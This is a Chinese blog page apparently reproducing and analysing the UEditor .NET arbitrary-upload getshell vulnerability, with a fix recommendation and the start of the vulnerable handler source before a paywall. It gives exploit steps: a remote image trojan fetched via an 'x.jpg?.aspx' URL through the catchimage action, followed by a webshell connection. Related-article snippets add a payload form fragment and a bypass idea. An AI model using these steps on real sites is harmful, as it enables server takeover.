ueditor php漏洞,ueditor getshell漏洞重现及分析

最新推荐文章于 2024-06-14 10:05:36 发布
最新推荐文章于 2024-06-14 10:05:36 发布
阅读量1.6k 收藏
点赞数
文章标签: ueditor php漏洞

0x00 概述

8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。

0x01 漏洞重现

Payload:

shell addr:

图片马x.jpg放在自己服务器上

提交http://www.domain.top/x.jpg?.aspx

83ec49af6d1fe29be0bb5fa5c4f899eb240.jpg

返回:

5a9639ca5872e180ae83a92b9d702e0d2ce.jpg

菜刀连接:

745b958b204d692acd0cf9e625028d4c29a.jpg

0x02 修复方案

增加文件扩展名校验(白名单)

0x03 漏洞分析

ueditor1_4_3_3-utf8-net\utf8-net\net\controller.ashx

using System;

using System.Web;

using System.IO;

using System.Collections;

using Newtonsoft.Json;

public class UEditorHandler : IHttpHandler

{

public void ProcessRequest(HttpContext context)

{

Handler action = null;

switch (context.Request["action"])

{

case "config":

action = new ConfigHandler(context);

break;

case "uploadimage":

action = new UploadHandler(context, new UploadConfig()

{

AllowExtensions = Config.GetStringList("imageAllowFiles"),

PathFormat = Config.GetStrin

最低0.47元/天 解锁文章
院花有点甜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ueditor php 漏洞_ueditor 1.3.6和1.4.3版本文件上传漏洞复现
weixin_39830323的博客
12-01 1万+
最近遇到了两个版本的ueditor文件上传漏洞,因此记录一下。ueditor 1.3.6这个版本下的漏洞,是位于本地图片上传这个位置。使用谷歌浏览器复现的时候,要注意一个细节所以可以使用低版本的谷歌浏览器继续复现,也可以使用IE复现。通过网站技术分析插件Wappalyzer可知网站建站语言是php随便输入一个目录,根据报错可知网站中间件为apache另外,使用module模式与php结合...
ue编辑器漏洞_ueditor getshell漏洞重现分析
weixin_39633165的博客
12-21 970
0x00 概述8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。0x01 漏洞重现Payload:shelladdr:图片马x.jpg放在自己服务器上提交http://www.domain.top/x.jpg?.aspx返回:菜刀连接:0x02 修复方案增加文件扩展名校验(白名单)0x03 漏洞分析uedi...
百度编辑器UEditor v1.4.3 PHP版 GBK
05-10
UEditor1.4.3更新说明修复hasContents接口在非ie下只有空格时判断还为真的问题 修复在粘贴word内容时,会误命中cm,pt这样的文本内容变成px的问题 优化删除编辑器再创建编辑器时,编辑器的容器id发生变化的问题 修复提交jsonp请求时,callback参数的xss漏洞 新增jsp后台多种服务器配置下的路径定位 修复ZeroClipboard的flash地址参数名称错误 修复getActionUrl的bug 整理配置参数,把遗漏在代码中的配置项整理到ueditor.config.js里 修复图片拉伸工具和编辑拉伸长高器的样式冲突 修复文字的unicod
ueditor getshell漏洞重现分析
weixin_30681121的博客
12-07 1280
0x00 概述 8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。 0x01 漏洞重现 Payload: <formaction=”http://www.xxx.com/controller.ashx?action=catchimage”enctype=”application/x-w...
技术分享-ueditor漏洞利用&源码分析超详细分析
最新发布
zzz6583zz的博客
06-14 439
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
UEditor 任意文件上传漏洞
热门推荐
qq_50854662的博客
10-27 2万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文......
UEditor .Net版本任意文件上传漏洞
Jietewang的博客
07-18 2097
目录 前言 漏洞利用 前言 最近接到以前老客户的刷脸需求进行一次测试,挖到了一个漏洞,借机更新一下博客吧。UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,攻击者利用此漏洞可以在服务器上执行任意指令。 漏洞利用 隐患url: http://XXX.XXX.XXX.XXX:1111...
ueditor漏洞修复
02-11
 Ueditor编辑器上传漏洞导致getshell  漏洞存在版本:1.4.3.3 Net版(目前最新版本,已停更) 二、修复文件 ueditor\net\App_Code\CrawlerHandler.cs 下载本附件,按上述路径覆盖文件即可。实测可用。
百度编辑器UEditor PHP版 v1.4.3
04-03
Ueditor是由百度web前端研发部开发所见即所得的编辑器,具有轻量,可定制,注重用户体验等特点。Ueditor基于BSD开源协议,除了具有代码精简、加载迅速的轻量级特质外,还采用了分层理念,使开发者可以根据实际应用和...
ueditor+php.zip
03-04
【标题】"ueditor+php.zip" 涉及的核心技术是富文本编辑器PHP的结合应用。ueditor是一款非常流行的开源JavaScript富文本编辑器,它提供了丰富的编辑功能,如文字格式化、图片上传、表格操作等,使得网页内容编辑变...
基于PHPUEditor
07-15
部署在PHPUEditor,关键点还在路径配置上,有什么问题,可以和我交流。QQ:70747053.博客地址:http://blog.csdn.net/leamonlm
百度编辑器UEditor完整版dome(php
11-12
**百度编辑器UEditor简介** 百度编辑器UEditor是一款由百度公司开发的开源富文本在线编辑器,主要用于网站内容编辑。它提供了丰富的编辑功能,包括文字格式化、图片上传、视频插入、链接创建等,使得非技术人员也能...
百度编辑器ueditor-dev-1.5.0 gbk-php 编译版
06-13
- **图片管理**:内置图片上传功能,支持多图上传、图片预览及裁剪。 - **多媒体插入**:可插入视频、音频,并支持在线播放。 - **代码高亮**:对于编程语言代码,自动进行语法高亮显示。 - **表格操作**:创建...
php如何接入UEditor富文本编辑器
03-23
php接入UEditor富文本编辑器 部分代码展现 /** * 获取文件完整路径 * @return string */ private function getFilePath() { $fullname = $this->fullName; $rootPath = $_SERVER['DOCUMENT_ROOT'].'/FRONT_...
php项目中百度 UEditor 简单安装调试和调用
10-23
主要介绍了php项目中百度 UEditor 简单安装调试和调用的相关资料,需要的朋友可以参考下
针对Ueditor不出网getshell的解决方法
Adminxe的博客
09-18 756
刚才转csdn,发现az写了一个关于Ueditor不出网问题的解决问题,思路非常不错,相当于组合拳形式,然后我来做个总结: 1、针对于不出网问题,可以使用127.0.0.1或者localhost进行绕过,当然绕过的前提是通过ueditor编辑器上传一张图片马,记住哈,一定要用被攻击站点的编辑器进行上传,然后获取到图片马的地址; 2、第二点需要主义的就是127.0.0.1或者localhost对外开放的端口问题,利用伪协议探测端口或者强大的信息收集能力获取内网ip及端口,从而找到出口地方还是.
ueditor富文本编辑器上传木马图片或木马文件漏洞
美奇软件开发工作室
04-27 1518
ueditor插件目录一般都自带index.html文件(完整demo文件),这个文件原来是用来测试插件功能的,但。插件目录下的index.html文件,删除不影响ueditor富文本编辑器的正常功能;
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 6325
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
ueditor php漏洞
07-28
2. 文件上传漏洞UEditor提供了文件上传功能,但如果没有进行文件类型和大小等安全限制,攻击者可以上传恶意文件,如Web shell,从而获取服务器权限。 3. XSS攻击:UEDitor支持插入HTML代码和脚本,如果没有进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值